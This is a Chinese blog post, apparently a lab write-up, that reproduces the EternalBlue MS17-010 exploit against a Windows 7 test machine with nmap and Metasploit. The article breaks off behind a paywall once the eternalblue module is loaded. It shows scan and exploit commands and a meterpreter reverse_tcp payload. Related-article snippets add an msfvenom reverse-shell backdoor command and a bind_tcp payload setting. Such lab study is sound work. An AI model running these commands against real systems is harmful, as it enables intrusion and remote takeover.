永恒之蓝 MS17-010 漏洞复现

最新推荐文章于 2024-04-09 12:05:46 发布
最新推荐文章于 2024-04-09 12:05:46 发布
阅读量1.2k 收藏 3
点赞数 2
分类专栏: 笔记 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53409153/article/details/118884464
版权

永恒之蓝简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

SMB协议

SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔 (Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。. SMB 是在会话层(session layer)和 表示层 (presentation layer)以及小部分 应用层 (application layer)的协议。. SMB使用了NetBIOS的 应用程序接口 (Application Program Interface,简称API)。

在win7中打开SMB

在这里介绍SMB,主要是在复现永恒之蓝(MS17-010 )时,我们需要在靶机中打开SMB,以此来进行攻击。

攻击条件

1.攻击机:ubuntu 20.4作为攻击机,对靶机进行攻击
2.靶机:win7(有的需要关闭防火墙,不然可能会没有补丁)

攻击过程

1.查看IP

1.查看攻击机ip:

ifconfig

inet后面就是IP地址:

192.168.34.135

在这里插入图片描述
2.查看靶机ip:

ipconfig

ip地址:

192.168.34.141=----=-

在这里插入图片描述

2.检测连通性

在攻击机的终端输入:

ping 192.168.34.141
在这里插入图片描述

开始攻击

1.先打开Metasploit(我的ubuntu的Metasploit是需要安装的,教程的话,可以自己在网上搜索,而且安装后,第一次启动会有点慢),直接键入:

msfconsole

在这里插入图片描述输入以后等待一段时间,出现*msf6*就可以了(每次进入的时候,界面都是不一样的)。
2.确定目标之后,对目标进行端口扫描:

nmap -p445 192.168.34.141 -Pn

3.使用msf的ms17-010进行攻击:
首先输入:

search ms17-010

在这里插入图片描述
4.在使用use auxiliary/scanner/smb/smb_ms17_010进行检测:
输入

show options

在这里插入图片描述

set rhost 192.168.34.141
run

被方框标记的就是说靶机有可能会被攻击
在这里插入图片描述
5. 使用攻击模块攻击use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述
我的这个初始就是这样的,说为配置有效负载,然后解决方法如下:

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > Interrupt: use the 'exit' command to quit
msf6 exploit(windows/smb
最低0.47元/天 解锁文章
7earn
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010
薛定谔嘚喵博客
04-25 2518
攻击机:Linux kali(IP:192.168.107.129)靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143)实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
永恒之蓝 MS17-010漏洞复现超级详细(虽然最后一步复现失败)
qq_44768719的博客
11-08 6691
一:漏洞原理 1:简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 二、漏洞复现 准备: 一台关掉了防火墙的的win7(IP地址为192.168.1.101) 一台kalI 开始操作: 信息收集: 用nmap去扫描目标机的端口开启情况: nmap -sS -sV 192.168.1.101 这时候在发现445端口开启,这正是永恒之蓝利用的必备条件,且版本为win7-10 这时候我们可以利用msf去加载exp去利用 2.打开m
永恒之蓝漏洞复现(详细版),字节跳动+阿里+华为+小米等10家大厂面试真题
最新发布
2401_84138968的博客
04-09 759
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。需要配置的有点多,重新选择一个。1.检查防火墙是否关闭。
永恒之蓝漏洞复现
weixin_44897902的博客
09-23 248
参考: https://blog.csdn.net/n5xxxx__zy/article/details/90705057 目标ip:192.168.91.149 攻击机:192.168.91.146 目标系统:win7 攻击机:kail 准备工作: 目标机:win7开启网络共享:控制面板-网络和共享中心-更改高级共享设置-启用网络发现-关闭密码保护共享-保存修改 攻击机:开启postgres...
漏洞复现永恒之蓝MS-17010+修复
BROTHERYY的博客
08-20 1638
攻击机:192.168.20.101 靶机:192.168.20.103 使用msf的扫描模块,扫描靶机是否存在漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.20.103 run 使用攻击载荷进行攻击 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhosts 192.168.20.10
[-] Auxiliary failed: Msf::OptionValidateError The following options fa
lixixi
07-10 1万+
msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > set RHOSTS 192.168.229.133 RHOSTS => 192.168.229.133 msf auxiliary(smb_version) > run [-] Auxiliary failed: Msf::OptionVal
网安永恒之蓝MS17-010检测工具.zip
03-01
永恒之蓝MS17-010漏洞检测工具
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
"永恒之蓝"是2017年引起全球关注的安全事件,主要由名为"MS17-010"的Windows系统漏洞引发。这个漏洞利用了微软Windows操作系统中的SMB(Server Message Block)服务,允许攻击者远程执行代码,从而控制受影响的系统...
msfvenom
ss810540895的博客
04-20 2618
在使用最新版msf时 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.70.19 LPORT 4444 -f elf > backdoor.elf 报错如下 [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payl...
ipc$连接失败的常见原因
清流弯弯
07-06 7682
<br /><br /><br /> <br /><br />以下是一些常见的导致ipc$连接失败的原因:<br /><br />1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;<br /><br />2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭
Samba服务器登录失败
Starting
07-25 3857
<br />在Linux终端用smbclient登录samba服务器的时候,出现了以下的错误:<br />tree connect failed: NT_STATUS_BAD_NETWORK_NAME<br />试了好几次都是这样,仔细看了一下,ip和共享名都没有错,防火墙也关了,后来发现,原来开了selinux,于是把selinux禁掉,就OK了!<br />具体操作,打开/etc/selinux/config,  设置SELINUX=disabled<br /> 
five86-1靶机渗透攻略
weixin_47311099的博客
01-11 1207
five86-1攻略 下载地址https://www.five86.com/five86-1.html 主机发现 nmap -sP 192.168.8.0/24 目标IP地址为 192.168.8.141 端口扫描 nmap -A 192.168.8.141 -p- 发现22ssh、80http、10000Webmin(基于web的unix管理工具) 访问80端口 空白页面 后台扫描 dirb http://192.168.8.141 robots文件里发现一个/ona目录,访问后得到 o
MSF漏洞利用完成但无法创建会话的几种原因
热门推荐
慢就是快
12-02 3万+
文章目录1.引言2.原因2.1漏洞payload和目标架构不匹配2.1.1 解决办法2.2 参数LHOST/SRVHOST 配置不当2.2.1 解决办法2.3 使用了NAT模式2.3.1 解决办法2.4存在杀软/EDR终端管理等2.4.1 解决办法2.5漏洞利用模块存在问题2.5.1 解决办法2.6目标已经修复漏洞打了补丁2.6.1 解决办法2.7 防火墙限制2.7.1 解决办法 1.引言 在实际攻防中经常用到一些漏洞模块去测试目标是否存在对应漏洞,比如下列模块: exploit/windows/smb/p
[我的作死案例]图书馆泡妹记 上
wjy397的专栏
06-28 3199
https://bbs.ichunqiu.com/thread-24168-1-1.html 吾本布衣i春秋-呆萌菜鸟 发表于前天14:28253388 本帖最后由 0nise 于 2017-6-26 10:14 编辑 缘起缘落:简单来说,图书馆看见一个妹子长得还不错,然后...
ElasticSearch启动报错,常规解决方法
07-30 8018
启动检查没有通过 [2017-07-30T13:54:23,964][INFO ][o.e.b.BootstrapChecks    ] [Z3aG6HQ] bound or publishing to a non-loopback or non-link-local address, enforcing bootstrap checks ERROR: [2] bootstrap checks
永恒之蓝ms17_010漏洞复现实验
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞复现实验。这是因为复现漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现漏洞,以免违法和造成不必要的损失。 如果您对网络安全感兴趣,我可以为您提供一些关于网络安全的基础知识和防护措施。请问您对此感兴趣吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值